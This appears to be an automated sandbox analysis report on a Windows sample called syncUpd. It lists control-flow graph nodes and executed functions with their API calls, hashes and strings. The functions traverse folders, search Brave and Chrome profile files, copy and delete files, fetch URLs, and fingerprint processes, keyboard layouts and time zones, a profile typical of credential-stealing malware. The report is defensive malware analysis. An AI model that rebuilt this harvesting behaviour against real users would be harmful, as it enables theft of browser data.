___scrt_release_startup_lock 82387->82388 82389 6a3db07b 82388->82389 82390 6a3db082 82388->82390 82413 6a3db341 IsProcessorFeaturePresent 82389->82413 82393 6a3db087 _configure_narrow_argv 82390->82393 82392 6a3db080 82392->82373 82394 6a3db095 _initialize_narrow_environment 82393->82394 82395 6a3db092 82393->82395 82394->82392 82395->82373 82397 6a3db20c ___scrt_fastfail 82396->82397 82398 6a3db218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 82397->82398 82399 6a3db302 ___scrt_fastfail 82398->82399 82399->82362 82400->82370 82401->82359 82402->82382 82404 6a3daf9e 82403->82404 82405 6a3daf9a 82403->82405 82406 6a3db028 82404->82406 82409 6a3dafab ___scrt_release_startup_lock 82404->82409 82405->82385 82407 6a3db1f7 ___scrt_fastfail 6 API calls 82406->82407 82408 6a3db02f 82407->82408 82410 6a3dafb8 _initialize_onexit_table 82409->82410 82412 6a3dafd6 82409->82412 82411 6a3dafc7 _initialize_onexit_table 82410->82411 82410->82412 82411->82412 82412->82385 82413->82392 82414 6a3a3060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 82419 6a3dab2a 82414->82419 82418 6a3a30db 82423 6a3dae0c _crt_atexit _register_onexit_function 82419->82423 82421 6a3a30cd 82422 6a3db320 5 API calls ___raise_securityfailure 82421->82422 82422->82418 82423->82421 82424 6a3a35a0 82425 6a3a35c4 InitializeCriticalSectionAndSpinCount getenv 82424->82425 82440 6a3a3846 __aulldiv 82424->82440 82427 6a3a38fc strcmp 82425->82427 82431 6a3a35f3 __aulldiv 82425->82431 82429 6a3a3912 strcmp 82427->82429 82427->82431 82428 6a3a38f4 82429->82431 82430 6a3a35f8 QueryPerformanceFrequency 82430->82431 82431->82430 82432 6a3a375c 82431->82432 82433 6a3a3622 _strnicmp 82431->82433 82435 6a3a3944 _strnicmp 82431->82435 82437 6a3a395d 82431->82437 82438 6a3a3664 GetSystemTimeAdjustment 82431->82438 82434 6a3a376a QueryPerformanceCounter EnterCriticalSection 82432->82434 82436 6a3a37b3 LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 82432->82436 82439 6a3a37fc LeaveCriticalSection 82432->82439 82432->82440 82433->82431 82433->82435 82434->82432 82434->82436 82435->82431 82435->82437 82436->82432 82436->82439 82438->82431 82439->82432 82439->82440 82441 6a3db320 5 API calls ___raise_securityfailure 82440->82441 82441->82428 82442 6a3bc930 GetSystemInfo VirtualAlloc 82443 6a3bc9a3 GetSystemInfo 82442->82443 82448 6a3bc973 82442->82448 82445 6a3bc9d0 82443->82445 82446 6a3bc9b6 82443->82446 82447 6a3bc9d8 VirtualAlloc 82445->82447 82445->82448 82446->82445 82450 6a3bc9bd 82446->82450 82452 6a3bc9ec 82447->82452 82453 6a3bc9f0 82447->82453 82458 6a3db320 5 API calls ___raise_securityfailure 82448->82458 82449 6a3bc99b 82450->82448 82451 6a3bc9c1 VirtualFree 82450->82451 82451->82448 82452->82448 82459 6a3dcbe8 GetCurrentProcess TerminateProcess 82453->82459 82458->82449 82460 6a3db9c0 82461 6a3db9ce dllmain_dispatch 82460->82461 82462 6a3db9c9 82460->82462 82464 6a3dbef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 82462->82464 82464->82461

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 00411650 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 237filestringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00411669
                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00411680
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 004116D2
                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0041D7F8), ref: 004116E4
                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0041D7FC), ref: 004116FA
                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00411980
                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF), ref: 00411995
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                                                                                                                                                                                                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                                                                                                                                                                                                                  • API String ID: 1125553467-2524465048
                                                                                                                                                                                                                                  • Opcode ID: dc165bfe059858b008f46a8c8689db8cb5fddec1d4dee71b8375d3b2251b46db
                                                                                                                                                                                                                                  • Instruction ID: 56f1237c2d7c520c90c98f1ce5fb3a6d9b51b415e2d0c2f733ce4a2014328567
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc165bfe059858b008f46a8c8689db8cb5fddec1d4dee71b8375d3b2251b46db
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE9172B19006189BDB24EFA4DC85FEA737DBF88300F044589F61A92191DB789AC5CFA5
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040B610 Relevance: 39.2, APIs: 17, Strings: 5, Instructions: 675fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 720 40b610-40b6a2 call 416d40 call 416f20 call 416fb0 call 416ea0 call 416e00 * 2 call 416d40 * 2 call 4170d0 FindFirstFileA 739 40b6e1-40b6f5 StrCmpCA 720->739 740 40b6a4-40b6dc call 416e00 * 6 call 413220 720->740 741 40b6f7-40b70b StrCmpCA 739->741 742 40b70d 739->742 785 40bf8b-40bf8e 740->785 741->742 744 40b712-40b78b call 416e20 call 416f20 call 416fb0 * 2 call 416ea0 call 416e00 * 3 741->744 745 40bf30-40bf43 FindNextFileA 742->745 790 40b791-40b817 call 416fb0 * 4 call 416ea0 call 416e00 * 4 744->790 791 40b81c-40b89d call 416fb0 * 4 call 416ea0 call 416e00 * 4 744->791 745->739 749 40bf49-40bf56 FindClose call 416e00 745->749 755 40bf5b-40bf86 call 416e00 * 5 call 413220 749->755 755->785 827 40b8a2-40b8b8 call 4170d0 StrCmpCA 790->827 791->827 830 40ba79-40ba8f StrCmpCA 827->830 831 40b8be-40b8d2 StrCmpCA 827->831 832 40ba91-40bad1 call 401500 call 416da0 * 3 call 409b30 830->832 833 40bade-40baf4 StrCmpCA 830->833 831->830 834 40b8d8-40b9f2 call 416d40 call 415260 call 416fb0 call 416f20 call 416ea0 call 416e00 * 3 call 4170d0 * 2 CopyFileA call 416d40 call 416fb0 * 2 call 416ea0 call 416e00 * 2 call 416da0 call 4093a0 831->834 899 40bad6-40bad9 832->899 835 40bb66-40bb7e call 416da0 call 415490 833->835 836 40baf6-40bb0d call 4170d0 StrCmpCA 833->836 986 40b9f4-40ba36 call 416da0 call 401500 call 404dc0 call 416e00 834->986 987 40ba3b-40ba74 call 4170d0 DeleteFileA call 417040 call 4170d0 call 416e00 * 2 834->987 858 40bc51-40bc66 StrCmpCA 835->858 859 40bb84-40bb8b 835->859 849 40bb61 836->849 850 40bb0f-40bb5b call 401500 call 416da0 * 3 call 40a030 836->850 856 40beb9-40bec2 849->856 850->849 862 40bf20-40bf2b call 417040 * 2 856->862 863 40bec4-40bf15 call 401500 call 416da0 * 2 call 416d40 call 40b610 856->863 871 40be50-40be65 StrCmpCA 858->871 872 40bc6c-40bdcf call 416d40 call 416fb0 call 416ea0 call 416e00 call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 4170d0 * 2 CopyFileA call 401500 call 416da0 * 3 call 40a6e0 call 401500 call 416da0 * 3 call 40ace0 call 4170d0 StrCmpCA 858->872 865 40bbf7-40bc41 call 401500 call 416da0 call 416d40 call 416da0 call 40a030 859->865 866 40bb8d-40bb94 859->866 862->745 935 40bf1a 863->935 943 40bc46 865->943 876 40bbf5 866->876 877 40bb96-40bbef call 401500 call 416da0 call 416d40 call 416da0 call 40a030 866->877 871->856 882 40be67-40beae call 401500 call 416da0 * 3 call 40aa20 871->882 1019 40bdd1-40be1b call 401500 call 416da0 * 3 call 40b250 872->1019 1020 40be26-40be3e call 4170d0 DeleteFileA call 417040 872->1020 885 40bc4c 876->885 877->876 947 40beb3 882->947 885->856 899->856 935->862 943->885 947->856 986->987 987->830 1036 40be20 1019->1036 1028 40be43-40be4e call 416e00 1020->1028 1028->856 1036->1020
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                    • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                    • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                    • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,0041D71A,0041D717,00000000,?,?,?,0041DB54,0041D716), ref: 0040B695
                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0041DB58), ref: 0040B6ED
                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0041DB5C), ref: 0040B703
                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040BF3B
                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF), ref: 0040BF4D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                                                                                                                  • String ID: @Kr$Brave$Google Chrome$Preferences$\Brave\Preferences
                                                                                                                                                                                                                                  • API String ID: 3334442632-1995909648
                                                                                                                                                                                                                                  • Opcode ID: c7c3ee99c4ae816946169d1e265cb946bac083ea11a6c42839c32c6eeee0e167
                                                                                                                                                                                                                                  • Instruction ID: 76d401781d3fce7c968e745dc043d6a6225f477281f2400f678919b217ba5a4c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c7c3ee99c4ae816946169d1e265cb946bac083ea11a6c42839c32c6eeee0e167
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F423572A0010457CF14FB61DC56EEE773DAF84304F41455EF90AA6181EE38AB89CBE9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040D1C0 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                    • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                    • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                    • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0041DC10,0041D73F), ref: 0040D22B
                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0041DC14), ref: 0040D273
                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0041DC18), ref: 0040D289
                                                                                                                                                                                                                                  • FindNextFileA.KERNELBASE(000000FF,?), ref: 0040D4EE
                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF), ref: 0040D500
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                                                                                                                  • String ID: 8Jr
                                                                                                                                                                                                                                  • API String ID: 3334442632-1638193829
                                                                                                                                                                                                                                  • Opcode ID: de9534d38254fefd06480637589c9ca20507d8755ec8c9e1e7e424c8080e94d4
                                                                                                                                                                                                                                  • Instruction ID: a7e743a2a4f5118c59e4eb5b7e6cabc454f6fbff0e67e47d23a58287cf68124a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: de9534d38254fefd06480637589c9ca20507d8755ec8c9e1e7e424c8080e94d4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 63913B72A0020497CB14FFB1EC569EE777DAB84308F41466EF90A96581EE38D788CBD5
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00404C70 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81networkmemoryfileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404C8A
                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00404C91
                                                                                                                                                                                                                                  • InternetOpenA.WININET(0041D79B,00000000,00000000,00000000,00000000), ref: 00404CAA
                                                                                                                                                                                                                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00404CD1
                                                                                                                                                                                                                                  • InternetReadFile.WININET(c.A,?,00000400,00000000), ref: 00404D01
                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(c.A), ref: 00404D75
                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00404D82
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                                                                                                                                                                                                                  • String ID: c.A$c.A
                                                                                                                                                                                                                                  • API String ID: 3066467675-270182787
                                                                                                                                                                                                                                  • Opcode ID: ff34e455916cb5254e18773c9340263e729f543755462a643926861e0345f7f7
                                                                                                                                                                                                                                  • Instruction ID: 93472a029acc8278824907ab7d145ea178407da7df790c597300061c638fc298
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff34e455916cb5254e18773c9340263e729f543755462a643926861e0345f7f7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3731F8F4A00218ABDB20DF54DD85BDDB7B5BB88304F5081D9F709A7280DB746AC58F98
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004015C0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215C4,?,00401E03,?,004215C8,?,?,00000000,?,00000000), ref: 00401813
                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004215CC), ref: 00401863
                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004215D0), ref: 00401879
                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401C30
                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 00401CB4
                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00401D0A
                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF), ref: 00401D1C
                                                                                                                                                                                                                                    • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                    • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                    • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                                                                                                                                                                                                  • String ID: \*.*
                                                                                                                                                                                                                                  • API String ID: 1415058207-1173974218
                                                                                                                                                                                                                                  • Opcode ID: b4d217c2a32c323df012dff938534dacdb494f817d2ec8d97e3e5cb294c5cda7
                                                                                                                                                                                                                                  • Instruction ID: 3aa4ae790513c502dab12fd0122e5550b13815c0fff8c800b600eb4522263f51
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4d217c2a32c323df012dff938534dacdb494f817d2ec8d97e3e5cb294c5cda7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D41225759102189BCB15FB61DC56EEE7739AF54308F41419EB10A62091EF38AFC9CFA8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00414570 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                  • GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
                                                                                                                                                                                                                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
                                                                                                                                                                                                                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 004146DF
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                                                                                                                                                                                                  • String ID: /
                                                                                                                                                                                                                                  • API String ID: 3090951853-4001269591
                                                                                                                                                                                                                                  • Opcode ID: 294f136ef59468542dff649e32f3b16774d834884e78db4a947e8595ab33b79e
                                                                                                                                                                                                                                  • Instruction ID: e4a09482d03fe0ac07b2aa12fe49ef9b635f824a972481fa3f662a7a2871ed61
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 294f136ef59468542dff649e32f3b16774d834884e78db4a947e8595ab33b79e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5413B74940218ABCB24DF50DC89BEDB775BB54308F2042DAE10A66191DB786FC5CF54
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00414DE0 Relevance: 6.1, APIs: 4, Instructions: 60processCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
                                                                                                                                                                                                                                  • Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                    • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcpy$Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcatlstrlen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3491751439-0
                                                                                                                                                                                                                                  • Opcode ID: 46479fa1dff31d1553307a673ed5531c210884f90894ffa9fa2d91d76bee7172
                                                                                                                                                                                                                                  • Instruction ID: b51d58226d22fc07b4aaea4bdcaba1b12d12dab42e387443cd86e66b2ce9f1c4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 46479fa1dff31d1553307a673ed5531c210884f90894ffa9fa2d91d76bee7172
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED211D759002189BCB24EB61DC95FDEB779AF54304F1041DAA50A66190DF38AFC5CF94
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004144B0 Relevance: 6.0, APIs: 4, Instructions: 32memorytimeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,00724D08,00000000,?,0041D758,00000000,?,00000000,00000000,?,00725238,00000000), ref: 004144C0
                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 004144C7
                                                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00414514
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
